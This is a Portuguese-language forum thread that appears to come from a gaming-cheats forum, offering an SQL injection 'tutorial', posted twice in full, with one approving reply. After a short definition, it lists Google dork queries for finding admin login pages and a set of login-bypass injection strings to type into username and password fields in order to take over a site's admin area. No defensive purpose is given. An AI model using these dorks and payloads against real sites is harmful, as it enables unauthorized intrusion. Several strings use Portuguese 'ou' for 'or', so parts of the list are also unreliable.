Procurar
Últimos assuntos
[ Tutorial ] SQL INJECTION
2 participantes
Página 1 de 1
[ Tutorial ] SQL INJECTION
o queé sql injection ? .
'Structured Query Language' (SQL) é uma linguagem textual usada para interagir com uma base de dados relacional. A unidade de execução do SQL é uma 'query', que é uma coleção de instruções que retornam uma pesquisa na base de dados. Os comandos e parâmetros de uma 'query' podem modificar a estrutura da base de dados (usando instruções Data Definition Language, ou DDL) e manipulando o conteúdo dos bancos de dados. (usando insturções Data Manipulation Language, ou DML).
SQL Injection ocorre quando o atacante consegue inserir uma série de intruções SQL dentro de uma 'query' através da manipulação das entrada de dados de uma aplicação.
Como Achar um site vulneravel .
va no site da google e jogue algum desses codigod abaixo , ira aparecer varias paginas que vai te levar ate o login do adm do site entao voce vai pra segunda parte
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
Como loga no adm do site.
Jogando algum desses codigos no campo de login e senha caso ele seja vul ele ira abri o adm do site com tudo ai e so vc mexer e owna :F
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
Editar/Deletar Mensagem
'Structured Query Language' (SQL) é uma linguagem textual usada para interagir com uma base de dados relacional. A unidade de execução do SQL é uma 'query', que é uma coleção de instruções que retornam uma pesquisa na base de dados. Os comandos e parâmetros de uma 'query' podem modificar a estrutura da base de dados (usando instruções Data Definition Language, ou DDL) e manipulando o conteúdo dos bancos de dados. (usando insturções Data Manipulation Language, ou DML).
SQL Injection ocorre quando o atacante consegue inserir uma série de intruções SQL dentro de uma 'query' através da manipulação das entrada de dados de uma aplicação.
Como Achar um site vulneravel .
va no site da google e jogue algum desses codigod abaixo , ira aparecer varias paginas que vai te levar ate o login do adm do site entao voce vai pra segunda parte
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
Como loga no adm do site.
Jogando algum desses codigos no campo de login e senha caso ele seja vul ele ira abri o adm do site com tudo ai e so vc mexer e owna :F
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
Editar/Deletar Mensagem
Re: [ Tutorial ] SQL INJECTION
Boa admin!
Rick- Membro de Honra
- Mensagens : 329
Golds : 6233
Reputação : 19
Data de inscrição : 12/09/2009
Idade : 30
Tópicos semelhantes
» Tutorial - KS
» [TUTORIAL] Criando FTP
» Bug boss (IV) & Tutorial
» Tutorial - Efeito de coloração
» Tutorial - Blue fire
» [TUTORIAL] Criando FTP
» Bug boss (IV) & Tutorial
» Tutorial - Efeito de coloração
» Tutorial - Blue fire
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos
Ter Set 25, 2012 4:49 pm por pele2009
» Ganhe dinheiro online!(Verdadeiro)
Seg maio 03, 2010 10:23 pm por Rick
» Site Metalknuxx GC Tools 4.0
Dom maio 02, 2010 7:28 pm por Rick
» ID de todos itens Grand Chase season 1
Dom maio 02, 2010 7:27 pm por Rick
» Editando sistema Esanta
Dom maio 02, 2010 7:27 pm por Rick
» IDs de itens para eventos e GM
Dom maio 02, 2010 7:27 pm por Rick
» Erros tempo de execuçao
Sáb Mar 27, 2010 5:39 pm por Rick
» Download do game
Sáb Mar 27, 2010 5:35 pm por Rick
» Ant erro - Aprovado
Sáb Mar 27, 2010 5:33 pm por Rick